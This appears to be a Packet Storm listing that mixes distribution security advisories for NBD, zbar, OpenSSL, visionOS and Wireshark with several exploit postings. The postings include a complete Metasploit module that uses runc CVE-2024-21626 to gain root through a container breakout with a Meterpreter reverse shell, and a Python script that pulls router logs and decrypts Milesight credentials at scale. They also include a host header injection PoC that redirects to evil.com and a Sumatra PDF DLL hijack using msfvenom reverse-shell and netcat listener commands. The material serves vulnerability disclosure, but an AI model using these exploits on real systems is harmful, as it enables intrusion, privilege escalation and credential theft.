Gentoo Linux Security Advisory 202402-10 - Multiple vulnerabilities have been found in NBD Tools, the worst of which could result in arbitrary code execution. Versions greater than or equal to 3.24 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202402-10  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: Normal  
    Title: NBD Tools: Multiple Vulnerabilities  
     Date: February 04, 2024  
     Bugs: #834678  
       ID: 202402-10

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

Multiple vulnerabilities have been found in NBD Tools, the worst of  
which could result in arbitary code execution.

Background  
==========

The NBD Tools are the Network Block Device utilities allowing one to use  
remote block devices over a TCP/IP network. It includes a userland NBD  
server.

Affected packages  
=================

Package        Vulnerable    Unaffected  
-------------  ------------  ------------  
sys-block/nbd  < 3.24        >= 3.24

Description  
===========

Multiple vulnerabilities have been discovered in NBD Tools. Please  
review the CVE identifiers referenced below for details.

Impact  
======

Please review the referenced CVE identifiers for details.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All NBD Tools users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=sys-block/nbd-3.24"

References  
==========

[ 1 ] CVE-2022-26495  
      https://nvd.nist.gov/vuln/detail/CVE-2022-26495  
[ 2 ] CVE-2022-26496  
      https://nvd.nist.gov/vuln/detail/CVE-2022-26496

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202402-10

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2024 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202402-10

runc versions 1.1.11 and below, as used by containerization technologies such as Docker engine and Kubernetes, are vulnerable to an arbitrary file write vulnerability. Due to a file descriptor leak it is possible to mount the host file system with the permissions of runc (typically root). Successfully tested on Ubuntu 22.04 with runc 1.1.7-0ubuntu1~22.04.1 using Docker build.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Local  Rank = ExcellentRanking  include Msf::Post::Linux::Priv  include Msf::Post::Linux::System  include Msf::Post::File  include Msf::Exploit::EXE  include Msf::Exploit::FileDropper  prepend Msf::Exploit::Remote::AutoCheck  def initialize(info = {})    super(      update_info(        info,        'Name' => 'runc (docker) File Descriptor Leak Privilege Escalation',        'Description' => %q{          All versions of runc <=1.1.11, as used by containerization technologies such as Docker engine,          and Kubernetes are vulnerable to an arbitrary file write.          Due to a file descriptor leak it is possible to mount the host file system          with the permissions of runc (typically root).          Successfully tested on Ubuntu 22.04 with runc 1.1.7-0ubuntu1~22.04.1 using Docker build.        },        'License' => MSF_LICENSE,        'Author' => [          'h00die', # msf module          'Rory McNamara' # Discovery        ],        'Platform' => [ 'linux' ],        'Arch' => [ ARCH_X86, ARCH_X64 ],        'SessionTypes' => [ 'shell', 'meterpreter' ],        'Targets' => [[ 'Auto', {} ]],        'Privileged' => true,        'References' => [          [ 'URL', 'https://snyk.io/blog/cve-2024-21626-runc-process-cwd-container-breakout/'],          [ 'URL', 'https://github.com/opencontainers/runc/security/advisories/GHSA-xr7r-f8xq-vfvv'],          [ 'CVE', '2024-21626']        ],        'DisclosureDate' => '2024-01-31',        'DefaultTarget' => 0,        'Notes' => {          'AKA' => ['Leaky Vessels'],          'Stability' => [CRASH_SAFE],          'Reliability' => [REPEATABLE_SESSION],          'SideEffects' => [ARTIFACTS_ON_DISK]        },        'DefaultOptions' => {          'EXITFUNC' => 'thread',          'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp',          'MeterpreterTryToFork' => true        }      )    )    register_advanced_options [      OptString.new('WritableDir', [ true, 'A directory where we can write and execute files', '/tmp' ]),      OptString.new('DOCKERIMAGE', [ true, 'A docker image to use', 'alpine:latest' ]),      OptInt.new('FILEDESCRIPTOR', [ true, 'The file descriptor to use, typically 7, 8 or 9', 8 ]),    ]  end  def base_dir    datastore['WritableDir'].to_s  end  def check    sys_info = get_sysinfo    unless sys_info[:distro] == 'ubuntu'      return CheckCode::Safe('Check method only available for Ubuntu systems')    end    return CheckCode::Safe('Check method only available for Ubuntu systems') if executable?('runc')    # Check the app is installed and the version, debian based example    package = cmd_exec('runc --version')    package = package.split[2] # runc, version, <the actual version>    if package&.include?('1.1.7-0ubuntu1~22.04.1') || # jammy 22.04 only has 2 releases, .1 (vuln) and .2       package&.include?('1.0.0~rc10-0ubuntu1') || # focal only had 1 release prior to patch, 1.1.7-0ubuntu1~20.04.2 is patched       package&.include?('1.1.7-0ubuntu2') # mantic only had 1 release prior to patch, 1.1.7-0ubuntu2.2 is patched      return CheckCode::Appears("Vulnerable runc version #{package} detected")    end    unless package&.include?('+esm') # bionic patched with 1.1.4-0ubuntu1~18.04.2+esm1 so anything w/o +esm is vuln      return CheckCode::Appears("Vulnerable runc version #{package} detected")    end    CheckCode::Safe("runc #{package} is not vulnerable")  end  def exploit    # Check if we're already root    if !datastore['ForceExploit'] && is_root?      fail_with Failure::None, 'Session already has root privileges. Set ForceExploit to override'    end    # Make sure we can write our exploit and payload to the local system    unless writable? base_dir      fail_with Failure::BadConfig, "#{base_dir} is not writable"    end    # create directory to write all our files to    dir = "#{base_dir}/.#{rand_text_alphanumeric(5..10)}"    mkdir(dir)    register_dirs_for_cleanup(dir)    # Upload payload executable    payload_path = "#{dir}/.#{rand_text_alphanumeric(5..10)}"    vprint_status("Uploading Payload to #{payload_path}")    write_file(payload_path, generate_payload_exe)    register_file_for_cleanup(payload_path)    # write docker file    vprint_status("Uploading Dockerfile to #{dir}/Dockerfile")    dockerfile = %(FROM #{datastore['DOCKERIMAGE']}    WORKDIR /proc/self/fd/#{datastore['FILEDESCRIPTOR']}    RUN cd #{'../' * 8} && chmod -R 777 #{dir[1..]} && chown -R root:root #{dir[1..]} && chmod u+s #{payload_path[1..]} )    write_file("#{dir}/Dockerfile", dockerfile)    register_file_for_cleanup("#{dir}/Dockerfile")    print_status('Building from Dockerfile to set our payload permissions')    output = cmd_exec "cd #{dir} && docker build ."    output.each_line { |line| vprint_status line.chomp }    # delete our docker image    if output =~ /Successfully built ([a-z0-9]+)$/      print_status("Removing created docker image #{Regexp.last_match(1)}")      output = cmd_exec "docker image rm #{Regexp.last_match(1)}"      output.each_line { |line| vprint_status line.chomp }    end    fail_with(Failure::NoAccess, "File Descriptor #{datastore['FILEDESCRIPTOR']} not available, try again (likely) or adjust FILEDESCRIPTOR.") if output.include? "mkdir /proc/self/fd/#{datastore['FILEDESCRIPTOR']}: not a directory"    fail_with(Failure::NoAccess, 'Payload SUID bit not set') unless get_suid_files(payload_path).include? payload_path    print_status("Payload permissions set, executing payload (#{payload_path})...")    cmd_exec "#{payload_path} &"  endend

runc 1.1.11 File Descriptor Leak Privilege Escalation

Debian Linux Security Advisory 5614-1 - Two vulnerabilities were discovered in zbar, a library for scanning and decoding QR and bar codes, which may result in denial of service, information disclosure or potentially the execution of arbitrary code if a specially crafted code is processed.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5614-1                   security@debian.orghttps://www.debian.org/security/                     Salvatore BonaccorsoFebruary 03, 2024                     https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : zbarCVE ID         : CVE-2023-40889 CVE-2023-40890Debian Bug     : 1051724Two vulnerabilities were discovered in zbar, a library for scanning anddecoding QR and bar codes, which may result in denial of service,information disclosure or potentially the execution of arbitrary code ifa specially crafted code is processed.For the oldstable distribution (bullseye), these problems have beenfixed in version 0.23.90-1+deb11u1.For the stable distribution (bookworm), these problems have been fixedin version 0.23.92-7+deb12u1.We recommend that you upgrade your zbar packages.For the detailed security status of zbar please refer to its securitytracker page at:https://security-tracker.debian.org/tracker/zbarFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQKTBAEBCgB9FiEERkRAmAjBceBVMd3uBUy48xNDz0QFAmW+cM5fFIAAAAAALgAoaXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2NDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQACgkQBUy48xNDz0RZEQ/+LBd+YadiS/TNfrBy9lYnugnavklh9VSEkO+sKYFVzkq/ypQwuaLA0MaIt0OOIGIrwDVXL0/Lb6Rjuo96PGQX6NJXF2iG7UUD8RjiJDHIFPUP9nbWOjXmNAdtnfUvF9AwyExSpCREhXc2PTDc5lmnAu56NWrJRN53RqngbYSxILoOpNRBDlZUEL3RNrbpPvpQnvIBo2JcmaT/PtgC+U5bxKfnQGQ2Cree/nyq8de9VCPwGeTczqFz8I3NsklG9k8/09+zdJOUpy+KVi+ylTAG/f/ydzGtrFyr++hPU692PIGeu++N3yNX1mP9KWhsAdkfL581RauwKRgHFnRXK/yUDg7rDUlMRd0w5QphDkL+01mjzgiooGBp5I7OGXvdVgribWdexRiKE0nfzf6sHxzbHXRdCOiPWhGAf5w6ORdpgRwuICo4mWTw1T8GJktFfuLXP7uRIdVIMeIVVVLfFYBQeTr8g7A0TV1ysAzG+yjHVhfYJxTVS9rTNmt8MJbO6ZBgWnMdMbd+4xlngWMpxDOInhdFBTmbyBdWnbMOQDZhgXLy0Hd0VF96UoQkWoHxphpbioY5on053jSsU6FH0r1bSm5rjOfCkRVLalCTjZyY4TqCSmbTlq3qyxUHgT9ws2M+//SpJKzwGvVXN8+0M3BzVXUGJYmLG0v0/+jb58wUBUA==OOtS-----END PGP SIGNATURE-----

Debian Security Advisory 5614-1

SISQUAL WFM version 7.1.319.103 suffers from a host header injection vulnerability.

    # Exploit Title: SISQUAL WFM 7.1.319.103 Host Header Injection# Discovered Date: 17/03/2023# Reported Date: 17/03/2023# Exploit Author: Omer Shaik (unknown_exploit)# Vendor Homepage: https://www.sisqualwfm.com# Version: 7.1.319.103# Tested on: SISQUAL WFM 7.1.319.103# Affected Version: sisqualWFM - 7.1.319.103# Fixed Version: sisqualWFM - 7.1.319.111# CVE : CVE-2023-36085# CVSS: 3.1 (AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N)# Category: Web Apps# Reference: https://github.com/omershaik0/Handmade_Exploits/tree/main/SISQUALWFM-Host-Header-Injection-CVE-2023-36085A proof-of-concept(POC) scenario that demonstrates a potential host header injection vulnerability in sisqualWFM version 7.1.319.103, specifically targeting the /sisqualIdentityServer/core endpoint. This vulnerability could be exploited by an attacker to manipulate webpage links or redirect users to another site with ease, simply by tampering with the host header.****************************************************************************************************Orignal Request****************************************************************************************************GET /sisqualIdentityServer/core/login HTTP/2Host: sisqualwfm.cloudCookie:<cookie>Sec-Ch-Ua: "Not A(Brand";v="24", "Chromium";v="110"Sec-Ch-Ua-Mobile: ?0Sec-Ch-Ua-Platform: "Linux"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.78 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9****************************************************************************************************Orignal Response****************************************************************************************************HTTP/2 302 FoundCache-Control: no-store, no-cache, must-revalidateLocation: https://sisqualwfm.cloud/sisqualIdentityServer/core/Strict-Transport-Security: max-age=31536000; includeSubDomains; preloadX-Content-Type-Options: nosniffX-Frame-Options: sameoriginDate: Wed, 22 Mar 2023 13:22:10 GMTContent-Length: 0****************************************************************************************************██████╗  ██████╗  ██████╗██╔══██╗██╔═══██╗██╔════╝██████╔╝██║   ██║██║     ██╔═══╝ ██║   ██║██║     ██║     ╚██████╔╝╚██████╗╚═╝      ╚═════╝  ╚═════╝                ****************************************************************************************************Request has been modified to redirect user to evil.com (Intercepted request using Burp proxy)****************************************************************************************************GET /sisqualIdentityServer/core/login HTTP/2Host: evil.comCookie:<cookie>Sec-Ch-Ua: "Not A(Brand";v="24", "Chromium";v="110"Sec-Ch-Ua-Mobile: ?0Sec-Ch-Ua-Platform: "Linux"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.78 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9****************************************************************************************************Response****************************************************************************************************HTTP/2 302 FoundCache-Control: no-store, no-cache, must-revalidateLocation: https://evil.com/sisqualIdentityServer/core/Strict-Transport-Security: max-age=31536000; includeSubDomains; preloadX-Content-Type-Options: nosniffX-Frame-Options: sameoriginContent-Length: 0****************************************************************************************************Method of Attack****************************************************************************************************curl -k --header "Host: attack.host.com" "Domain Name + /sisqualIdentityServer/core" -vvv****************************************************************************************************

SISQUAL WFM 7.1.319.103 Host Header Injection

Ubuntu Security Notice 6622-1 - David Benjamin discovered that OpenSSL incorrectly handled excessively long X9.42 DH keys. A remote attacker could possibly use this issue to cause OpenSSL to consume resources, leading to a denial of service. Sverker Eriksson discovered that OpenSSL incorrectly handled POLY1304 MAC on the PowerPC architecture. A remote attacker could use this issue to cause OpenSSL to crash, resulting in a denial of service, or possibly execute arbitrary code. This issue only affected Ubuntu 22.04 LTS and Ubuntu 23.04.

==========================================================================  
Ubuntu Security Notice USN-6622-1  
February 05, 2024

openssl vulnerabilities  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 23.10  
- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS

Summary:

Several security issues were fixed in OpenSSL.

Software Description:  
- openssl: Secure Socket Layer (SSL) cryptographic library and tools

Details:

David Benjamin discovered that OpenSSL incorrectly handled excessively long  
X9.42 DH keys. A remote attacker could possibly use this issue to cause  
OpenSSL to consume resources, leading to a denial of service.  
(CVE-2023-5678)

Sverker Eriksson discovered that OpenSSL incorrectly handled POLY1304 MAC  
on the PowerPC architecture. A remote attacker could use this issue to  
cause OpenSSL to crash, resulting in a denial of service, or possibly  
execute arbitrary code. This issue only affected Ubuntu 22.04 LTS and  
Ubuntu 23.04. (CVE-2023-6129)

It was discovered that OpenSSL incorrectly handled excessively long RSA  
public keys. A remote attacker could possibly use this issue to cause  
OpenSSL to consume resources, leading to a denial of service. This issue  
only affected Ubuntu 22.04 LTS and Ubuntu 23.04. (CVE-2023-6237)

Bahaa Naamneh discovered that OpenSSL incorrectly handled certain malformed  
PKCS12 files. A remote attacker could possibly use this issue to cause  
OpenSSL to crash, resulting in a denial of service. (CVE-2024-0727)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 23.10:  
   libssl3                         3.0.10-1ubuntu2.2

Ubuntu 22.04 LTS:  
   libssl3                         3.0.2-0ubuntu1.14

Ubuntu 20.04 LTS:  
   libssl1.1                       1.1.1f-1ubuntu2.21

After a standard system update you need to reboot your computer to make all  
the necessary changes.

References:  
   https://ubuntu.com/security/notices/USN-6622-1  
   CVE-2023-5678, CVE-2023-6129, CVE-2023-6237, CVE-2024-0727

Package Information:  
   https://launchpad.net/ubuntu/+source/openssl/3.0.10-1ubuntu2.2  
   https://launchpad.net/ubuntu/+source/openssl/3.0.2-0ubuntu1.14  
   https://launchpad.net/ubuntu/+source/openssl/1.1.1f-1ubuntu2.21

Ubuntu Security Notice USN-6622-1

Apple Security Advisory 02-02-2024-1 - visionOS 1.0.2 addresses a code execution vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

APPLE-SA-02-02-2024-1 visionOS 1.0.2

visionOS 1.0.2 addresses the following issues.  
Information about the security content is also available at  
https://support.apple.com/HT214070.

Apple maintains a Security Releases page at  
https://support.apple.com/HT201222 which lists recent  
software updates with security advisories.

WebKit  
Available for: Apple Vision Pro  
Impact: Processing maliciously crafted web content may lead to   
arbitrary code execution. Apple is aware of a report that this issue   
may have been exploited.  
Description: A type confusion issue was addressed with improved  
checks.  
WebKit Bugzilla: 267134  
CVE-2024-23222

Instructions on how to update visionOS are available  
at https://support.apple.com/HT214009 To check the software   
version on your Apple Vision Pro, open the Settings app and choose   
General > About.

All information is also posted on the Apple Security Releases  
web site: https://support.apple.com/HT201222.

This message is signed with Apple's Product Security PGP key,  
and details are available at:  
https://www.apple.com/support/security/pgp/  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEEsz9altA7uTI+rE/qX+5d1TXaIvoFAmW9aewACgkQX+5d1TXa  
IvrZNxAAlUqs8RDuCeo/N9dUGSvXociXTXDrbhZzKZeQ+RQjLNnW9fyUailHNcMM  
a2Udpkty1/eDQIWgZxTl8ftcBycxeEsatn29UpYaWNsRLuYPInTKr8LCdv4evUJm  
KTnW4xyprG5hKbiVKV17inpxLwF0YyziC5ZTa670f1POT9B7tYRvlj0rvp8OK9+V  
Gh/9gEKEwwhvc7DnwvtxIJsNZf0TPcRtjNBYxgXEghT8+a5H3dERVWiMyLepAh8X  
Vrf5Hfy0SI792u53LIvN8zP2nLuQr3Sw0ZxxJsUOGNWmyg1SoF2jmAh56Ksh/MbV  
fS4EhyfaZTSR4YycFZtuUozAoFiZ+Sk62xTTZGV64DxGvVu6Vr0gOp4K65fNy1QU  
L6nkwc89G1TSHdbVlCLtP8VZYFpFlAOmtYklb7e0oGYYrY5QZmQoXoTMmcK/sTcJ  
+mBsfHU+zXOXRDQ+XSg/JLtlUy5+jV8JOnT46At+sueVvnRvOyg12Wjuo4dzuzNh  
1zDVnmfVRnRRmT6ZXHlTEMcaTmnCk73jZEP00maem6DGHYCjcVAW8MqK3IcHv79U  
YKQ+t14ooVbskTPdDHrAzznK3nUQNkC8FytW8Z3bNhdpl1yMKyFJPYROPxRMTJQN  
vhZ4nKx1Lz3yaCJsH3dkuKOLvggM9vz/oa3Qv8NKh1loShhj0JU=  
=pJSu  
-----END PGP SIGNATURE-----

Apple Security Advisory 02-02-2024-1

Milesight IoT router versions UR5X, UR32L, UR32, UR35, and UR41 suffer from a credential leaking vulnerability due to unprotected system logs and weak password encryption.

    #!/usr/bin/env python3# -*- coding: utf-8 -*-"""Title: Credential Leakage Through Unprotected System Logs and Weak Password EncryptionCVE: CVE-2023-43261Script Author: Bipin Jitiya (@win3zz)Vendor: Milesight IoT - https://www.milesight-iot.com/ (Formerly Xiamen Ursalink Technology Co., Ltd.)Software/Hardware: UR5X, UR32L, UR32, UR35, UR41 and there might be other Industrial Cellular Router could also be vulnerable.Script Tested on: Ubuntu 20.04.6 LTS with Python 3.8.10Writeup: https://medium.com/@win3zz/inside-the-router-how-i-accessed-industrial-routers-and-reported-the-flaws-29c34213dfdf"""import sysimport requestsimport reimport warningsfrom Crypto.Cipher import AES # pip install pycryptodomefrom Crypto.Util.Padding import unpadimport base64import timewarnings.filterwarnings("ignore")KEY = b'1111111111111111'IV = b'2222222222222222'def decrypt_password(password):    try:        return unpad(AES.new(KEY, AES.MODE_CBC, IV).decrypt(base64.b64decode(password)), AES.block_size).decode('utf-8')    except ValueError as e:        display_output('      [-] Error occurred during password decryption: ' + str(e), 'red')def display_output(message, color):    colors = {'red': '\033[91m', 'green': '\033[92m', 'blue': '\033[94m', 'yellow': '\033[93m', 'cyan': '\033[96m', 'end': '\033[0m'}    print(f"{colors[color]}{message}{colors['end']}")    time.sleep(0.5)urls = []if len(sys.argv) == 2:    urls.append(sys.argv[1])if len(sys.argv) == 3 and sys.argv[1] == '-f':    with open(sys.argv[2], 'r') as file:        urls.extend(file.read().splitlines())if len(urls) == 0:    display_output('Please provide a URL or a file with a list of URLs.', 'red')    display_output('Example: python3 ' + sys.argv[0] + ' https://example.com', 'blue')    display_output('Example: python3 ' + sys.argv[0] + ' -f urls.txt', 'blue')    sys.exit()use_proxy = Falseproxies = {'http': 'http://127.0.0.1:8080/'} if use_proxy else Nonefor url in urls:    display_output('[*] Initiating data retrieval for: ' + url + '/lang/log/httpd.log', 'blue')    response = requests.get(url + '/lang/log/httpd.log', proxies=proxies, verify=False)    if response.status_code == 200:        display_output('[+] Data retrieval successful for: ' + url + '/lang/log/httpd.log', 'green')        data = response.text        credentials = set(re.findall(r'"username":"(.*?)","password":"(.*?)"', data))        num_credentials = len(credentials)        display_output(f'[+] Found {num_credentials} unique credentials for: ' + url, 'green')        if num_credentials > 0:            display_output('[+] Login page: ' + url + '/login.html', 'green')            display_output('[*] Extracting and decrypting credentials for: ' + url, 'blue')            display_output('[+] Unique Credentials:', 'yellow')            for i, (username, password) in enumerate(credentials, start=1):                display_output(f'    Credential {i}:', 'cyan')                decrypted_password = decrypt_password(password.encode('utf-8'))                display_output(f'      - Username: {username}', 'green')                display_output(f'      - Password: {decrypted_password}', 'green')        else:            display_output('[-] No credentials found in the retrieved data for: ' + url, 'red')    else:        display_output('[-] Data retrieval failed. Please check the URL: ' + url, 'red')

Milesight UR5X / UR32L / UR32 / UR35 / UR41 Credential Leakage

Gentoo Linux Security Advisory 202402-9 - Multiple out-of-bounds read vulnerabilities have been discovered in Wireshark. Versions greater than or equal to 4.0.11 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202402-09  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: Low  
    Title: Wireshark: Multiple Vulnerabilities  
     Date: February 04, 2024  
     Bugs: #915224, #917421  
       ID: 202402-09

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

Multiple out-of-bounds read vulnerabilities have been discovered in  
Wireshark.

Background  
==========

Wireshark is a versatile network protocol analyzer.

Affected packages  
=================

Package                 Vulnerable    Unaffected  
----------------------  ------------  ------------  
net-analyzer/wireshark  < 4.0.11      >= 4.0.11

Description  
===========

Multiple vulnerabilities have been discovered in Wireshark. Please  
review the CVE identifiers referenced below for details.

Impact  
======

Please review the referenced CVE identifiers for details.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All Wireshark users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=net-analyzer/wireshark-4.0.11"

References  
==========

[ 1 ] CVE-2023-5371  
      https://nvd.nist.gov/vuln/detail/CVE-2023-5371  
[ 2 ] CVE-2023-6174  
      https://nvd.nist.gov/vuln/detail/CVE-2023-6174  
[ 3 ] WNPA-SEC-2023-27  
[ 4 ] WNPA-SEC-2023-28

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202402-09

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2024 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202402-09

Sumatra PDF version 3.5.2 suffers from a DLL hijacking vulnerability.

    # Exploit Title: Sumatra PDF 3.5.2 DLL Hijacking# Date: 06.02.2024# Exploit Author: Ravishanka Silva# Vendor Homepage: https://www.sumatrapdfreader.org/free-pdf-reader# Software Link: https://www.sumatrapdfreader.org/download-free-pdf-viewer# Version: 3.5.2# Tested on: Windows 10, Windows 11# CVE : CVE-2024-24528Description:Sumatra PDF is a free and open-source document viewer for Windows. It is a lightweight and minimalistic application designed to quickly and efficiently view PDF, eBook (ePub, Mobi), XPS, DjVu, CHM, and comic book (CBZ and CBR) files.Key features of Sumatra PDF include its fast startup and rendering speed, support for a variety of document formats, and a user-friendly interface. While it may not have all the advanced features found in some other PDF viewers, Sumatra PDF is a popular choice for users who prioritize speed and simplicity in a document viewer.A DLL Hijacking vulnerability exists in Sumatra PDF Version 3.5.2 which allows a local attacker to execute arbitrary code and obtain a certain level of persistence on the compromised host, in the context of current logged-in user, by placing a crafted DLL in the installation directory, resulting in the hijacking of the following DLL files: dbgcore.DLLprofapi.dllPROPSYS.dllTextShaping.dllDWrite.dllProof of Concept:1. Create a malicious .dll file via msfvenom,msfvenom -p windows/x64/shell_reverse_tcp LHOST=<IP> LPORT=7777 -f dll -o dbgcore.DLL2. Place the malicious DLL inside the Sumatra PDF installation folder. (Usually "C:\Users\<username>\AppData\Local\SumatraPDF")3. Start a listener via nc,nc -lvp 77774. Open Sumatra PDF application, and observe the execution of the reverse shell.Demo:https://drive.google.com/file/d/1-OMJ0ZvR9TYJEg_AwspRcGEAQvOLHJ41/view?usp=sharing

Sumatra PDF 3.5.2 DLL Hijacking

Gentoo Linux Security Advisory 202402-8 - Multiple vulnerabilities have been found in OpenSSL, the worst of which could result in denial of service. Versions greater than or equal to 3.0.10 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202402-08  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: Normal  
    Title: OpenSSL: Multiple Vulnerabilities  
     Date: February 04, 2024  
     Bugs: #876787, #893446, #902779, #903545, #907413, #910556, #911560  
       ID: 202402-08

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

Multiple vulnerabilities have been found in OpenSSL, the worst of which  
could result in denial of service.

Background  
==========

OpenSSL is an Open Source toolkit implementing the Secure Sockets Layer  
(SSL v2/v3) and Transport Layer Security (TLS v1) as well as a general  
purpose cryptography library.

Affected packages  
=================

Package           Vulnerable    Unaffected  
----------------  ------------  ------------  
dev-libs/openssl  < 3.0.10      >= 3.0.10

Description  
===========

Multiple vulnerabilities have been discovered in OpenSSL. Please review  
the CVE identifiers referenced below for details.

Impact  
======

Please review the referenced CVE identifiers for details.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All OpenSSL users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=dev-libs/openssl-3.0.10"

References  
==========

[ 1 ] CVE-2022-3358  
      https://nvd.nist.gov/vuln/detail/CVE-2022-3358  
[ 2 ] CVE-2022-4203  
      https://nvd.nist.gov/vuln/detail/CVE-2022-4203  
[ 3 ] CVE-2022-4304  
      https://nvd.nist.gov/vuln/detail/CVE-2022-4304  
[ 4 ] CVE-2022-4450  
      https://nvd.nist.gov/vuln/detail/CVE-2022-4450  
[ 5 ] CVE-2023-0215  
      https://nvd.nist.gov/vuln/detail/CVE-2023-0215  
[ 6 ] CVE-2023-0216  
      https://nvd.nist.gov/vuln/detail/CVE-2023-0216  
[ 7 ] CVE-2023-0217  
      https://nvd.nist.gov/vuln/detail/CVE-2023-0217  
[ 8 ] CVE-2023-0286  
      https://nvd.nist.gov/vuln/detail/CVE-2023-0286  
[ 9 ] CVE-2023-0401  
      https://nvd.nist.gov/vuln/detail/CVE-2023-0401  
[ 10 ] CVE-2023-0464  
      https://nvd.nist.gov/vuln/detail/CVE-2023-0464  
[ 11 ] CVE-2023-0465  
      https://nvd.nist.gov/vuln/detail/CVE-2023-0465  
[ 12 ] CVE-2023-0466  
      https://nvd.nist.gov/vuln/detail/CVE-2023-0466  
[ 13 ] CVE-2023-2650  
      https://nvd.nist.gov/vuln/detail/CVE-2023-2650  
[ 14 ] CVE-2023-2975  
      https://nvd.nist.gov/vuln/detail/CVE-2023-2975  
[ 15 ] CVE-2023-3446  
      https://nvd.nist.gov/vuln/detail/CVE-2023-3446  
[ 16 ] CVE-2023-3817  
      https://nvd.nist.gov/vuln/detail/CVE-2023-3817

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202402-08

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2024 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Source

Packet Storm